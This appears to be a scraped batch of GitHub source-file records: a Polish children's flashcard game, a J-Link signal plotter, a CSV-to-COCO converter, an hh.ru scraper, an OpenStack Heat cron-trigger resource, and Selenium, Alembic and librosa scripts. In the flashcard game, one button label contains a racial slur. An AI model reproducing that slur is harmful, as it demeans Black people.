= Image.open(\"img/{}.jpg\".format(a))\n image = image.resize((250, 250), Image.ANTIALIAS)\n obrazek = ImageTk.PhotoImage(image)\n\n ###teraz zamiast tego jest button\n obrazekLabel = Label(frame, image=obrazek)\n obrazekLabel.image = obrazek\n #linia ponizej jako komentarz (test)\n obrazekLabel.grid(row=1, column=1)\n\n lewyButton = Button(window, text='LEWY', image=obrazek, command=lewy)\n lewyButton.grid(row=3, column=1)\n\n\n\n a2 = gierka.random_line()\n if a2 == a:\n a2 = gierka.random_line()\n if a2 == a:\n a2 = gierka.random_line()\n if a2 == a:\n a2 = gierka.random_line()\n if a2 == a:\n a2 = gierka.random_line()\n\n slowkoLabel2 = Label(frame, text='{}'.format(a2))\n slowkoLabel2.grid(row=2, column=2)\n\n image2 = Image.open(\"img/{}.jpg\".format(a2))\n image2 = image2.resize((250, 250), Image.ANTIALIAS)\n obrazek2 = ImageTk.PhotoImage(image2)\n\n #####teraz zamiast tego jest button\n obrazekLabel2 = Label(frame, image=obrazek2)\n obrazekLabel2.image = obrazek2\n ###linia ponizej dodana jako komentarz (test)\n obrazekLabel2.grid(row=1, column=2)\n #obrazekLabel2.bind('', prawy)\n\n prawyButton = Button(window, text='PRAWY', image=obrazek2, command=prawy)\n prawyButton.grid(row=3, column=2)\n\n if ktoreslowko == 0:\n gierka.tts(a, gierka.language)\n if ktoreslowko == 1:\n gierka.tts(a2, gierka.language)\n\n #gierka.czy = None\n # obrazekLabel2.bind(on_click)\n #time.sleep(5)\n\n\n\n #def czydobrze(ccc):\n # return\n\n\n\n\n ######button przeniesiony na dol, zeby z kompa dalo sie lepiej grac\n #nastepnyButton = Button(window, text='nastepny')\n nastepnyButton = Button(window, text='niderlandzki', command=setnl)\n nastepnyButton.place(x=300, y=360)\n\n nastepnyButtonAngielski = Button(window, text='angielski', command=setang)\n nastepnyButtonAngielski.place(x=380, y=360)\n\n nastepnyButtonEs = Button(window, text='niemiecki', command=setde)\n nastepnyButtonEs.place(x=460, y=360)\n\n nastepnyButtonPl = Button(window, text='polski', command=setpl)\n nastepnyButtonPl.place(x=560, y=360)\n\n nastepnyButtonAny = Button(window, text='Come on nigga', command=setanylanguage)\n nastepnyButtonAny.place(x=560, y=500)\n\n #cb = ttk.Combobox(window, values=[ \"January\",\"February\",\"March\", \"April\"])\n\n selected_language = tkinter.StringVar()\n\n cb = ttk.Combobox(window, textvariable=selected_language)\n cb['values'] = values_list\n cb.place(x=500, y=420)\n\n def month_changed(event):\n msg = f'You selected {cb.get()}!'\n showinfo(title='Result', message=msg)\n\n def language_changed(event):\n gierka.language_value = f'{cb.get()}'\n print(gierka.language_value)\n value_to_key(gierka.language_value)\n\n def value_to_key(a):\n for key, value in listajezykow.items():\n if value == a:\n print(key)\n return key\n\n #cb.bind('<>', month_changed)\n cb.bind('<>', language_changed)\n\n print(cb.get())\n ## search_age = cb.get()\n #for name, age in listajezykow.items():\n # if age == search_age:\n # print(name)\n\n\n #ramka()\n\n\n\n\n\n\n\n # load = Image.open(\"img/aap.jpg\")\n #render = ImageTk.PhotoImage(load)\n # img = Label(self, image=render)\n # img.image = render\n # img.place(x=0, y=0)\n\n window.title(\"Nauka slowek dla dzieci\")\n window.geometry('800x600')\n window.mainloop()\n def wpisywanie():\n lan_1: str = input(\"Slowko po holendersku:\")\n lan_2: str = input(\"Slowko po polsku:\")\n rzecz: str = input(\"Jaka to czesc mowy?\")\n\n\n\n #do sprawdzenia ta funkcja\n def wprowadz_slowo(slowa):\n database = r\"C:\\sqlite\\db\\kid.db\"\n conn = create_connection(database)\n\n sql = ''' INSERT INTO words (language_1,language_2,language_3,adding_date,rzeczownik,category)\n VALUES(?,?,?,?,?,?) '''\n\n cur = conn.cursor()\n cur.execute(sql, slowa)\n conn.commit()\n conn.close()\n #print(' Liczba dzisiaj dodanych slowek: ', ile_dodanych_dzis())\n return cur.lastrowid\n\n def create_connection(db_file):\n \"\"\" create a database connection to the SQLite database\n specified by db_file\n :param db_file: database file\n :return: Connection object or None\n \"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n return conn\n\n def create_table(conn, create_words_table):\n \"\"\" create a table from the create_table_sql statement\n :param create_words_table:\n :param conn: Connection object\n :param create_table_sql: a CREATE TABLE statement\n :return:\n \"\"\"\n try:\n c = conn.cursor()\n c.execute(create_words_table)\n except Error as e:\n print(e)\n\n\n def main():\n\n database = r\"C:\\sqlite\\db\\kid.db\"\n create_words_table = \"\"\" CREATE TABLE IF NOT EXISTS words (\n id integer PRIMARY KEY,\n language_1 text,\n language_2 text,\n sentence_1 text,\n sentence_2 text,\n sound1 text,\n sound2 text,\n sound3 text,\n sound4 text,\n language_5 text,\n category text,\n pic1 text,\n pic2 text,\n movie1 text,\n movie2 text,\n rzeczownik text,\n irregular_verb text,\n adding_date text,\n taken_from_language text\n ); \"\"\"\n algorytm = \"\"\" CREATE TABLE IF NOT EXISTS algorytm (\n id integer PRIMARY KEY,\n id_slowka integer,\n prawidlowo integer,\n nieprawidlowo integer,\n ile_poprawnych_z_rzedu integer,\n nauczone text,\n data_nauczenia text,\n i_p_z_rz_2 integer,\n utrwalone text,\n data_utrwalenia text,\n ostatecznie_utrwalone text,\n data_ostatecznego text\n ); \"\"\"\n\n user = \"\"\" CREATE TABLE IF NOT EXISTS user (\n id integer PRIMARY KEY,\n data text,\n ile_razy integer,\n prawidlowo integer,\n nieprawidlowo integer,\n ile_poprawnych_z_rzedu_temp integer,\n ile_poprawnych_max integer,\n ile_nauczonych text\n ); \"\"\"\n\n conn = gierka.create_connection(database)\n\n if conn is not None:\n gierka.create_table(conn, create_words_table)\n gierka.create_table(conn, algorytm)\n gierka.create_table(conn, user)\n #test()\n #random_line()\n #tts('heb je honger')\n gierka.okienko()\n\n else:\n print(\"Error! cannot create the database connection.\")\n\n\n\n\nif __name__ == '__main__':\n gierka.main()\n","repo_name":"spotispoti/fiszki","sub_path":"dzialajacagra220521.py","file_name":"dzialajacagra220521.py","file_ext":"py","file_size_in_byte":14417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71632521672","text":"import time\nimport JLinkWrapper\n\nimport IOCParser\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\nclass Plotter:\n def __init__(self, ioc, jlink, elfreader):\n self._ioc = ioc\n self._jlink = jlink\n self._elfreader = elfreader\n\n def _read_gpio(self):\n gpio_data = dict()\n \n input_reg_data = dict()\n output_reg_data = dict()\n for i in self._ioc.inputGpios:\n input_reg_data[i] = self._jlink.read_register(i, 'IDR')\n for o in self._ioc.outputGpios:\n output_reg_data[o] = self._jlink.read_register(o, 'ODR')\n\n for sig in self._ioc.signals:\n if self._ioc.signals[sig] == 'GPIO_Input':\n gpio_data[sig] = (input_reg_data[self._ioc.gpio[sig]] >> self._ioc.pin_num[sig]) & 1\n if self._ioc.signals[sig] == 'GPIO_Output':\n gpio_data[sig] = (output_reg_data[self._ioc.gpio[sig]] >> self._ioc.pin_num[sig]) & 1\n\n return gpio_data\n\n\n def plot_gpio(self, time_sec, delta_sec):\n x_vals = []\n y_vals = [[] for i in range(len(self._ioc.signals))]\n\n start_time = time.time()\n\n while (time.time() - start_time) < time_sec:\n sample_time = time.time()\n x_vals.append(sample_time - start_time)\n data = self._read_gpio()\n idx = 0\n for val in data:\n y_vals[idx].append(data[val])\n idx += 1\n time_to_sleep = delta_sec - (time.time() - sample_time)\n if time_to_sleep > 0:\n time.sleep(time_to_sleep)\n else:\n print('Missed sample point by ' + str(time_to_sleep * -1) + ' seconds')\n\n # TODO: Create data in second thread and update once per second?\n _, ax = plt.subplots(len(self._ioc.digital_signals), sharex=True)\n \n if len(self._ioc.digital_signals) > 1:\n io_num = 0\n for sig in self._ioc.digital_signals:\n ax[io_num].cla()\n ax[io_num].set_title(sig + ' (' + self._ioc.labels[sig] + ') [' + self._ioc.signals[sig] + ']')\n ax[io_num].set_ylim([-0.2, 1.2])\n ax[io_num].set_yticks([0,1])\n ax[io_num].step(x_vals, y_vals[io_num])\n io_num += 1\n else:\n sig = next(iter(self._ioc.digital_signals.keys()))\n ax.cla()\n ax.set_title(sig + ' (' + self._ioc.labels[sig] + ') [' + self._ioc.signals[sig] + ']')\n ax.set_ylim([-0.2, 1.2])\n ax.set_yticks([0,1])\n ax.step(x_vals, y_vals[0])\n \n plt.subplots_adjust(hspace=1)\n plt.xlabel('time (sec)')\n plt.show()\n\n def plot_adc(self, time_sec, delta_sec):\n addr = self._elfreader.getAddressOfSym('adcBuffer')\n size = self._elfreader.getSizeOfSym('adcBuffer')\n num_elem = int(size / 2)\n \n x_vals = []\n y_vals = [[] for i in range(num_elem)]\n\n start_time = time.time()\n\n while (time.time() - start_time) < time_sec:\n sample_time = time.time()\n x_vals.append(sample_time - start_time)\n data = self._jlink.memory_read16(addr, num_elem)\n idx = 0\n for val in data:\n y_vals[idx].append(val)\n idx += 1\n time_to_sleep = delta_sec - (time.time() - sample_time)\n if time_to_sleep > 0:\n time.sleep(time_to_sleep)\n else:\n print('Missed sample point by ' + str(time_to_sleep * -1) + ' seconds')\n\n # TODO: Create data in second thread and update once per second?\n _, ax = plt.subplots(num_elem, sharex=True)\n \n if num_elem > 1:\n io_num = 0\n # first print all signals of first ADC, then go to the next and so on...\n for adc in self._ioc.adcs:\n for sig in self._ioc.adcs[adc].regularConversionPins:\n ax[io_num].cla()\n ax[io_num].set_title(self._gen_adc_title(sig))\n ax[io_num].plot(x_vals, y_vals[io_num])\n io_num += 1\n else:\n # Print single signal\n sig = next(iter(self._ioc.analog_signals.keys()))\n ax.cla()\n ax.set_title(self._gen_adc_title(sig))\n ax.plot(x_vals, y_vals[0])\n \n plt.subplots_adjust(hspace=1)\n plt.xlabel('time (sec)')\n plt.show()\n \n def _gen_adc_title(self, sig):\n titlestr = sig\n if sig in self._ioc.labels:\n titlestr += ' (' + self._ioc.labels[sig] + ')'\n if sig in self._ioc.signals:\n titlestr += ' [' + self._ioc.signals[sig] + ']'\n return titlestr\n\n #def animate_gpio_plot(i, jlink):\t\n#\todr_val = jlink.read_register('GPIOA', 'ODR')\n#\t\n#\tx_vals.append(i)\n#\t\n#\tio_num = 0\n#\n#\tfor p in ax:\n#\t\ty_vals[io_num].append((odr_val >> io_num) & 1)\n#\t\tp.cla()\n#\t\tp.set_title('Bit ' + str(io_num))\n#\t\tp.step(x_vals, y_vals[io_num])\n#\t\tio_num += 1\n#\t\n#\t#for row in ax:\n#\t#\trow.scatter(i, (odr_val >> pin) & 1)\n#\t#\tpin += 1\n#\tplt.tight_layout()\n\n#def plot_gpio(time, delta):\n#\tglobal ax\n#\tglobal y_vals\n#\n#\t# TODO: Create data in second thread and update once per second?\n#\tfig,ax = plt.subplots(8)\n#\n#\tfor i in range(8):\n#\t\ty_vals.append([])\n#\n#\tani = FuncAnimation(plt.gcf(), animate_gpio_plot, interval=delta)\n#\n#\tplt.tight_layout()\n#\tplt.show()\n\n#def plot_gpio(time, delta):\n# fig, ax = plt.subplots(8, sharex=True)\n# fig.suptitle('Bla')\n# for i in range(time):\n# odr_val = read_register('GPIOA', 'ODR')\n# pin = 0\n# for row in ax:\n# row.scatter(i, (odr_val >> pin) & 1)\n# pin += 1\n# plt.pause(0.05)\n#","repo_name":"lrademacher/PyJLink","sub_path":"SignalPlotter.py","file_name":"SignalPlotter.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"38479382606","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport numpy as np\nimport pandas as pd\nimport glob\nimport cv2\nimport os\nimport shutil\nfrom IPython import embed\nfrom tqdm import tqdm\nimport argparse\n#0为背景\nparser = argparse.ArgumentParser(description='convert object label')\nparser.add_argument('keyframe_dir', metavar='DIR',\n help='path to frame dir')\nparser.add_argument('--mode', type=str, choices=['train', 'val', 'test'])\n\nargs = parser.parse_args()\nobj_name = open('objects_en.txt','r')\nobj_list = [line.rstrip() for line in obj_name]\nprint(obj_list)\nclass Csv2CoCo:\n\n def __init__(self,image_dir,total_annos):\n self.images = []\n self.annotations = []\n self.categories = []\n self.img_id = 0\n self.ann_id = 0\n self.image_dir = image_dir\n self.total_annos = total_annos\n\n def save_coco_json(self, instance, save_path):\n json.dump(instance, open(save_path, 'w'), ensure_ascii=False, indent=2) # indent=2 更加美观显示\n\n # 由txt文件构建COCO\n def to_coco(self, keys):\n self._init_categories()\n for key in keys:\n self.images.append(self._image(key))\n shapes = self.total_annos[key]\n for shape in shapes:\n bboxi = []\n for cor in shape[:-1]:\n bboxi.append(int(cor))\n label = shape[-1]\n #print('label',label)\n annotation = self._annotation(bboxi,label)\n print('annotation',annotation)\n self.annotations.append(annotation)\n self.ann_id += 1\n self.img_id += 1\n instance = {}\n instance['info'] = 'spytensor created'\n instance['license'] = ['license']\n instance['images'] = self.images\n instance['annotations'] = self.annotations\n instance['categories'] = self.categories\n return instance\n def to_coco_test(self, keys):\n self._init_categories()\n for key in keys:\n self.images.append(self._image(key))\n shapes = self.total_annos[key]\n for shape in shapes:\n bboxi = []\n for cor in shape[:-1]:\n bboxi.append(int(cor))\n #label = shape[-1]\n #print('label',label)\n #annotation = self._annotation(bboxi,label)\n print('annotation',annotation)\n #self.annotations.append(annotation)\n #self.ann_id += 1\n self.img_id += 1\n instance = {}\n instance['info'] = 'spytensor created'\n instance['license'] = ['license']\n instance['images'] = self.images\n #instance['annotations'] = self.annotations\n instance['categories'] = self.categories\n return instance\n\n # 构建类别\n def _init_categories(self):\n for k in obj_list:#classname_to_id.items():\n category = {}\n category['id'] = obj_list.index(k)\n category['name'] = k\n self.categories.append(category)\n\n # 构建COCO的image字段\n def _image(self, path):\n image = {}\n print(path)\n img = cv2.imread(self.image_dir + path)\n image['height'] = img.shape[0]\n image['width'] = img.shape[1]\n image['id'] = self.img_id\n image['file_name'] = path\n return image\n\n # 构建COCO的annotation字段\n def _annotation(self, shape,label):\n # label = shape[-1]\n points = shape[:4]\n annotation = {}\n annotation['id'] = self.ann_id\n annotation['image_id'] = self.img_id\n annotation['category_id'] = int(obj_list.index(label))\n annotation['segmentation'] = self._get_seg(points)\n annotation['bbox'] = self._get_box(points)\n annotation['iscrowd'] = 0\n annotation['area'] = 1.0\n return annotation\n\n # COCO的格式: [x1,y1,w,h] 对应COCO的bbox格式\n def _get_box(self, points):\n min_x = points[0]\n min_y = points[1]\n max_x = points[2]\n max_y = points[3]\n return [min_x, min_y, max_x - min_x, max_y - min_y]\n # segmentation\n def _get_seg(self, points):\n min_x = points[0]\n min_y = points[1]\n max_x = points[2]\n max_y = points[3]\n h = max_y - min_y\n w = max_x - min_x\n a = []\n a.append([min_x,min_y, min_x,min_y+0.5*h, min_x,max_y, min_x+0.5*w,max_y, max_x,max_y, max_x,max_y-0.5*h, max_x,min_y, max_x-0.5*w,min_y])\n return a\n \n\nif __name__ == '__main__':\n csv_file = \"{}.csv\".format(args.mode)\n image_dir = args.keyframe_dir#\"/home/sda/videonet/train/image/train/\"\n #print('image_dir',image_dir)\n saved_coco_path = \"./\"\n # 整合csv格式标注文件\n total_csv_annotations = {}\n annotations = pd.read_csv(csv_file,header=None).values\n for annotation in annotations:\n #print(annotation[0].split(os.sep)[-2]+'/'+annotation[0].split(os.sep)[-1])\n key = annotation[0].split(os.sep)[-2]+'/'+annotation[0].split(os.sep)[-1]\n value = np.array([annotation[1:]])\n if key in total_csv_annotations.keys():\n total_csv_annotations[key] = np.concatenate((total_csv_annotations[key],value),axis=0)\n else:\n total_csv_annotations[key] = value\n # 按照键值划分数据\n total_keys = list(total_csv_annotations.keys())\n in_keys = total_keys\n print(\"{}_n:\".format(args.mode), len(in_keys))#, 'val_n:', len(val_keys))\n # 创建必须的文件夹\n if not os.path.exists('%scoco/annotations/'%saved_coco_path):\n os.makedirs('%scoco/annotations/'%saved_coco_path)\n if not os.path.exists('%scoco/train2017/'%saved_coco_path):\n os.makedirs('%scoco/train2017/'%saved_coco_path)\n if not os.path.exists('%scoco/val2017/'%saved_coco_path):\n os.makedirs('%scoco/val2017/'%saved_coco_path)\n if not os.path.exists('%scoco/test2017/'%saved_coco_path):\n os.makedirs('%scoco/test2017/'%saved_coco_path)\n # 把训练集转化为COCO的json格式\n for file in in_keys:\n if not os.path.exists('{}coco/{}2017/{}'.format(saved_coco_path,args.mode,file.split('/')[0])):\n #print(file.split('/')[0])\n os.makedirs('{}coco/{}2017/{}'.format(saved_coco_path,args.mode,file.split('/')[0]))\n if not os.path.exists(\"{}coco/{}2017/{}\".format(saved_coco_path,args.mode,file)):\n shutil.copy(image_dir+file,\"{}coco/{}2017/{}\".format(saved_coco_path,args.mode,file))\n elif os.path.exists('{}coco/{}2017/{}'.format(saved_coco_path,args.mode,file.split('/')[0])):\n if not os.path.exists(\"{}coco/{}2017/{}\".format(saved_coco_path,args.mode,file)):\n shutil.copy(image_dir+file,\"{}coco/{}2017/{}\".format(saved_coco_path,args.mode,file))\n l2c = Csv2CoCo(image_dir=image_dir,total_annos=total_csv_annotations)\n if args.mode != 'test':\n instance = l2c.to_coco(in_keys)\n elif args.mode == 'test':\n instance = l2c.to_coco_test(in_keys)\n l2c.save_coco_json(instance, '{}coco/annotations/instances_{}2017.json'.format(saved_coco_path,args.mode))\n\n","repo_name":"Caoliangjie/coco_format_convert","sub_path":"csv2coco.py","file_name":"csv2coco.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"25167056807","text":"import csv\nimport requests\nfrom pathlib import Path\nfrom datetime import datetime, timedelta\n\ncurrent_dir = Path(__file__).parent\n\n\ndef get_hh_data(date: datetime, period: timedelta = timedelta(minutes=120)):\n \"\"\"Собирает данные с hh.ru за указанный период.\"\"\"\n final_data = [\n [\n \"name\",\n \"salary_from\",\n \"salary_to\",\n \"salary_currency\",\n \"area_name\",\n \"published_at\",\n ]\n ]\n date = date.replace(microsecond=0)\n orient_date = date + timedelta(days=1)\n date -= period\n while True:\n date += period\n if date <= orient_date:\n break\n page = 0\n while True:\n page += 1\n url = f\"https://api.hh.ru/vacancies?date_from={date.isoformat()}&date_to={(date + period).isoformat()}&per_page=100&page={page}&specialization=1\"\n response = requests.get(url)\n print(response, repr(response.text))\n if response.status_code != 200:\n break\n data = response.json()\n for item in data[\"items\"]:\n if item[\"salary\"] is None:\n continue\n final_data.append(\n [\n item[\"name\"],\n item[\"salary\"][\"from\"],\n item[\"salary\"][\"to\"],\n item[\"salary\"][\"currency\"],\n item[\"area\"][\"name\"],\n item[\"published_at\"],\n ]\n )\n if page + 1 >= data[\"pages\"]:\n break\n with open(current_dir / \"hh.csv\", \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(final_data)\n\n\nif __name__ == \"__main__\":\n get_hh_data(datetime(2022, 12, 21))\n","repo_name":"FUFSoB/urfu-python","sub_path":"src/extra/hh.py","file_name":"hh.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5069165740","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_log import log as logging\n\nfrom heat.common import exception\nfrom heat.common.i18n import _\nfrom heat.engine import attributes\nfrom heat.engine import constraints\nfrom heat.engine import properties\nfrom heat.engine import resource\nfrom heat.engine import support\nLOG = logging.getLogger(__name__)\n\n\nclass CronTrigger(resource.Resource):\n \"\"\"A resource implements Mistral cron trigger.\n\n Cron trigger is an object allowing to run workflow on a schedule. User\n specifies what workflow with what input needs to be run and also specifies\n how often it should be run. Pattern property is used to describe the\n frequency of workflow execution.\n \"\"\"\n\n support_status = support.SupportStatus(version='5.0.0')\n\n PROPERTIES = (\n NAME, PATTERN, WORKFLOW, FIRST_TIME, COUNT\n ) = (\n 'name', 'pattern', 'workflow', 'first_time', 'count'\n )\n\n _WORKFLOW_KEYS = (\n WORKFLOW_NAME, WORKFLOW_INPUT\n ) = (\n 'name', 'input'\n )\n\n ATTRIBUTES = (\n NEXT_EXECUTION_TIME, REMAINING_EXECUTIONS\n ) = (\n 'next_execution_time', 'remaining_executions'\n )\n\n properties_schema = {\n NAME: properties.Schema(\n properties.Schema.STRING,\n _('Name of the cron trigger.')\n ),\n PATTERN: properties.Schema(\n properties.Schema.STRING,\n _('Cron expression.'),\n constraints=[\n constraints.CustomConstraint(\n 'cron_expression')\n ]\n ),\n WORKFLOW: properties.Schema(\n properties.Schema.MAP,\n _('Workflow to execute.'),\n required=True,\n schema={\n WORKFLOW_NAME: properties.Schema(\n properties.Schema.STRING,\n _('Name or ID of the workflow.'),\n required=True,\n constraints=[\n constraints.CustomConstraint('mistral.workflow')\n ]\n ),\n WORKFLOW_INPUT: properties.Schema(\n properties.Schema.MAP,\n _('Input values for the workflow.')\n )\n }\n ),\n FIRST_TIME: properties.Schema(\n properties.Schema.STRING,\n _('Time of the first execution in format \"YYYY-MM-DD HH:MM\".')\n ),\n COUNT: properties.Schema(\n properties.Schema.INTEGER,\n _('Remaining executions.')\n )\n }\n\n attributes_schema = {\n NEXT_EXECUTION_TIME: attributes.Schema(\n _('Time of the next execution in format \"YYYY-MM-DD HH:MM:SS\".'),\n type=attributes.Schema.STRING\n ),\n REMAINING_EXECUTIONS: attributes.Schema(\n _('Number of remaining executions.'),\n type=attributes.Schema.INTEGER\n )\n }\n\n default_client_name = 'mistral'\n\n entity = 'cron_triggers'\n\n def validate(self):\n super(CronTrigger, self).validate()\n if not (self.properties[self.PATTERN]\n or self.properties[self.FIRST_TIME]):\n raise exception.PropertyUnspecifiedError(self.PATTERN,\n self.FIRST_TIME)\n\n def _cron_trigger_name(self):\n return self.properties.get(self.NAME) or self.physical_resource_name()\n\n def handle_create(self):\n workflow = self.properties.get(self.WORKFLOW)\n name = self._cron_trigger_name()\n identifier = workflow[self.WORKFLOW_NAME]\n\n args = {\n 'pattern': self.properties.get(self.PATTERN),\n 'workflow_input': workflow.get(self.WORKFLOW_INPUT),\n 'first_time': self.properties.get(self.FIRST_TIME),\n 'count': self.properties.get(self.COUNT)\n }\n\n cron_trigger = self.client().cron_triggers.create(name, identifier,\n **args)\n self.resource_id_set(cron_trigger.name)\n\n def _resolve_attribute(self, name):\n if self.resource_id is None:\n return\n trigger = self.client().cron_triggers.get(self.resource_id)\n if name == self.NEXT_EXECUTION_TIME:\n return trigger.next_execution_time\n elif name == self.REMAINING_EXECUTIONS:\n return trigger.remaining_executions\n\n def get_live_state(self, resource_properties):\n # Currently mistral just deletes cron trigger that was executed\n # (i.e. remaining execution is reached zero). In this case we can't\n # found the cron trigger by mistral api. Suppose that live state of\n # cron trigger is equal to the state stored in heat, otherwise we may\n # go through undesirable update-replace. This behaviour might be\n # changed after\n # https://blueprints.launchpad.net/mistral/+spec/mistral-cron-trigger-life-cycle\n # will be merged.\n LOG.warning(\"get_live_state isn't implemented for this type of \"\n \"resource due to specific behaviour of cron trigger \"\n \"in mistral.\")\n return {}\n\n\ndef resource_mapping():\n return {\n 'OS::Mistral::CronTrigger': CronTrigger,\n }\n","repo_name":"openstack/heat","sub_path":"heat/engine/resources/openstack/mistral/cron_trigger.py","file_name":"cron_trigger.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","stars":385,"dataset":"github-code","pt":"27"} +{"seq_id":"23005203413","text":"# coding = utf-8\nfrom operator import methodcaller\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\nfrom utils.element import getType\n\n\n# 导入包\ndef pys_import(pkg):\n components = pkg.split('.')\n mod = __import__(components[0] + '.' + components[1],\n fromlist=[components[2]])\n klass = getattr(mod, components[2])\n\n return klass\n\n\nclass Operation:\n def __init__(self, browser, element):\n self.browser = browser\n self.element = element\n\n def operation(self, config):\n if 'action' not in config.keys():\n return\n\n action = config.get('action', '')\n if not action:\n return\n\n if action == 'open':\n self.open(config)\n elif action == 'click':\n self.click()\n elif action == 'clickList':\n self.clickList()\n elif action == 'moveToClick':\n self.moveToClick()\n elif action == 'moveToClickList':\n self.moveToClickList()\n elif action == 'jsclick':\n self.jsclick()\n elif action == 'sendKeys':\n self.sendKeys(config.get('value'))\n elif action == 'modifyKeys':\n self.sendKeys(config.get('value'), True)\n elif action == 'sendListKeys':\n self.sendListKeys(config.get('value'), True)\n elif action == 'sendListKeys_10':\n self.sendListKeys_10(config.get('value'), True)\n elif action == 'upload':\n self.upload(config.get('value'))\n elif 'select' in action:\n self.select(action)\n else:\n # print('无操作'+action)\n pass\n\n # 打开操作,是click的一种,但是会判断是否已经打开过\n def open(self, config):\n if config.get('open').get('class') not in self.element.get_attribute(\n \"class\"):\n self.click()\n\n # 点击操作\n def click(self):\n self.element.click()\n\n # js点击操作\n def jsclick(self):\n self.browser.execute_script('arguments[0].click()', self.element)\n\n # 给列表填写值\n def clickList(self):\n for el in self.element:\n el.click()\n\n # 移动并点击操作\n def moveToClick(self):\n ActionChains(self.browser).click(self.element).perform()\n\n # 移动并点击操作\n def moveToClickList(self):\n for el in self.element:\n ActionChains(self.browser).click(el).perform()\n\n # 默认填写值\n def sendKeys(self, value, modify=False):\n self.writeKey(self.element, value, modify)\n\n # 给列表填写值\n def sendListKeys(self, value, modify=False):\n for el in self.element:\n self.writeKey(el, value, modify)\n\n # 给列表填写值(10次)\n def sendListKeys_10(self, value, modify=False):\n i = 0\n for el in self.element:\n if i == 10:\n break\n i = i + 1\n self.writeKey(el, value, modify)\n\n # 上传文件\n def upload(self, value):\n # filepath = os.getcwd() + value\n # print(filepath)\n # self.writeKey(element, filepath)\n self.writeKey(self.element, value)\n\n # 写值到元素里\n def writeKey(self, element, value, modify=False):\n if 'pkgpath' in value:\n callbacks = value.split(':')\n pkg = callbacks[1]\n func = callbacks[2]\n\n try:\n param = callbacks[3]\n if ',' in param:\n params = param.split(',')\n else:\n params = [param]\n except IndexError:\n params = []\n\n klass = pys_import(pkg)\n if params:\n value = methodcaller(func, params)(klass())\n else:\n value = methodcaller(func)(klass())\n\n # 清空旧值\n if modify:\n element.send_keys(Keys.CONTROL, \"a\")\n element.send_keys(Keys.DELETE)\n # element.clear()\n sleep(0.5)\n\n element.send_keys(value)\n\n # 选择元素\n def select(self, action):\n params = action.split('.')\n for el in self.element:\n is_show = el.is_displayed()\n if is_show:\n el.find_elements(getType(params[1]),\n params[2])[int(params[3])].click()\n","repo_name":"stingbo/pystest","sub_path":"utils/operation.py","file_name":"operation.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"27"} +{"seq_id":"71498993352","text":"\"\"\"remove slack_oauth_state column\n\nRevision ID: 3f137bef24e4\nRevises: 21e8f6f7a837\nCreate Date: 2020-07-06 04:20:47.952399\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = \"3f137bef24e4\"\ndown_revision = \"21e8f6f7a837\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"slack_user\", \"slack_oauth_state\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"slack_user\",\n sa.Column(\n \"slack_oauth_state\",\n sa.VARCHAR(length=36),\n autoincrement=False,\n nullable=True,\n ),\n )\n # ### end Alembic commands ###\n","repo_name":"busy-beaver-dev/busy-beaver","sub_path":"migrations/versions/20200706_04-20-47__remove_slack_oauth_state_column.py","file_name":"20200706_04-20-47__remove_slack_oauth_state_column.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"27"} +{"seq_id":"8085223248","text":"import librosa\nimport numpy as np\n\nsr = 16000\n\naudio1, sample_rate = librosa.load(\"./n_in_paris_speech.wav\", sr=16000)\nD1 = librosa.stft(audio1, n_fft=320)\nspec1, phase = librosa.magphase(D1)\nresult = np.log1p(spec1)\nnp.save(\"./n_in_paris_speech\", result)\n\naudio_config = dict(sample_rate=sr,\n window_size=.02,\n window_stride=0.01,\n window='hamming',\n noise_dir=None,\n noise_prob=0.4,\n noise_levels=(0.0, 0.5))\n\n# result = np.load(\"./n_in_paris_styled.wav_data.npy\")\nresult = np.load(\"./n_in_paris_speech.npy\")\nprint(result.shape)\na = np.exp(result) - 1\np = 2 * np.pi * np.random.random_sample(result.shape) - np.pi\nn_fft = int(audio_config['sample_rate'] * audio_config['window_size'])\n\nfor i in range(50):\n S = a * np.exp(1j * p)\n x = librosa.istft(S)\n p = np.angle(librosa.stft(x, n_fft))\n\n# librosa.output.write_wav(\"./n_in_paris_styled.wav\", x, sr)\nlibrosa.output.write_wav(\"./n_in_paris_saved.wav\", x, sr)\n","repo_name":"Eddie-yz/Fake-Rapper-Helper","sub_path":"save_wav.py","file_name":"save_wav.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36522152055","text":"import config\nimport requests\nimport json\nimport operator\nimport urllib\n\n# Set Up Azure API Connection:\nKEY = config.faceApiKey\nface_api_url = 